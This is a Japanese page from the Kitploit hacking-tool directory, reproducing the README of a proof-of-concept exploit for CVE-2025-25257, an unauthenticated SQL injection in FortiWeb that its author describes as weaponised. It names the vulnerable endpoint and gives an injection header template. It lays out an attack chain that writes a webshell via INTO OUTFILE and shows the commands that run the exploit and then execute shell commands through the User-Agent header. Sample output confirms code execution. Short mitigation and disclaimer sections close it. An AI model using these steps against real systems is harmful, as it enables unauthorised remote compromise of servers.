Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-25257 — PoC for CVE-2025-25257、FortiWebにおける認証不要の重大なSQLインジェクションです。Authorizationヘッダーを介したSQLiを利用してウェブシェルを書き込み、RCEを獲得します。ログイン不要、完全自動化。 | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

PoC for CVE-2025-25257、FortiWebにおける認証不要の重大なSQLインジェクションです。Authorizationヘッダーを介したSQLiを利用してウェブシェルを書き込み、RCEを獲得します。ログイン不要、完全自動化。

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2025-25257 – FortiWeb SQLiによるRCE

深刻なSQLインジェクション → ウェブシェル実行

発見・武器化: 0xgh057r3c0n


🧠 脆弱性概要

CVE-2025-25257 は、エンドポイント /api/fabric/device/status を公開する FortiWeb システムに影響を与え、Authorization ヘッダー入力の適切なサニタイズに失敗します。

攻撃者は認証なしでSQLインジェクションを実行し、サーバー上にウェブシェルを書き込み、リモートでコマンドを実行できます。


💥 攻撃フロー

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 脆弱なエンドポイント

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 エクスプロイトの特徴

  • Bearerトークンを介したSQLi
  • SQL INTO OUTFILE でシェルをドロップ
  • Pythonフックがchmodをトリガー
  • User-Agentを介してコマンド実行
  • 完全自動化PoC

🧪 使用方法

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

次に:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 必要条件

  • Python 3.6+
  • requests モジュール

インストール:

root@kitploit:~
pip install requests

📤 出力例

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 CVSS推定

MetricValue
基本スコア9.8 (緊急)
攻撃ベクトルネットワーク
必要な権限なし
ユーザー操作なし
影響高 (C/I/A)

🛡️ 緩和策

  • FortiWebファームウェアのアップデート(パッチが利用可能な場合)
  • すべてのヘッダー入力をサニタイズ
  • ファイル書き込みパスとCGI実行を制限

👨‍💻 作者

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ 免責事項

このPoCは教育および許可されたテストのみを目的としています。 自己責任で使用してください。作者は誤用について責任を負いません。


ツールをダウンロード